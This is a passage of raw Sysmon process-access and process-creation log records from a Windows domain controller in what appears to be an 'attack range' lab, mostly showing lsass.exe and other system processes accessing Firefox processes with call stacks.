10:51:30.551{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.551{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000288404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.551{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.551{C8EA50B7-11AA-6216-1605-000000003802}22282268C:\Program Files\Mozilla Firefox\firefox.exe{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Program Files\Mozilla Firefox\firefox.exe+30cfd|C:\Program Files\Mozilla Firefox\firefox.exe+2ff25|C:\Program Files\Mozilla Firefox\xul.dll+2052e4a|C:\Program Files\Mozilla Firefox\xul.dll+9962fe|C:\Program Files\Mozilla Firefox\xul.dll+9944b5|C:\Program Files\Mozilla Firefox\xul.dll+99b13e|C:\Program Files\Mozilla Firefox\xul.dll+83253d|C:\Program Files\Mozilla Firefox\xul.dll+168dd89|C:\Program Files\Mozilla Firefox\xul.dll+168c88a|C:\Program Files\Mozilla Firefox\xul.dll+9850af|C:\Program Files\Mozilla Firefox\xul.dll+249ae|C:\Program Files\Mozilla Firefox\xul.dll+8357fb|C:\Program Files\Mozilla Firefox\nss3.dll+68dc|C:\Program Files\Mozilla Firefox\nss3.dll+90731|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1ddf8|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000288402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.550{C8EA50B7-11B2-6216-1D05-000000003802}5848C:\Program Files\Mozilla Firefox\firefox.exe97.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2228.11.1632248527\909428012" -childID 6 -isForBrowser -prefsHandle 4748 -prefMapHandle 4396 -prefsLen 6018 -prefMapSize 251484 -jsInitHandle 976 -jsInitLen 279340 -parentBuildID 20220216172458 -appDir "C:\Program Files\Mozilla Firefox\browser" - 2228 "\\.\pipe\gecko-crash-server-pipe.2228" 4900 157ea2f0148 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32LowMD5=47024075D8FB7B85F0B6615FFB0E87A5,SHA256=FE842C526ABBEE926C9CFE27F45AE3BC20F5614878120A9150B1A2DDA1CD226D,IMPHASH=FAFFE564A2DAFFCCC4A6BE71D34C1748{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000288401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.542{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.542{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.542{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.542{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.542{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.539{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.539{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.539{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.539{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.539{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.539{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.539{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.539{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.535{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.535{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.535{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.535{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.535{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288383Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:30.535{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla 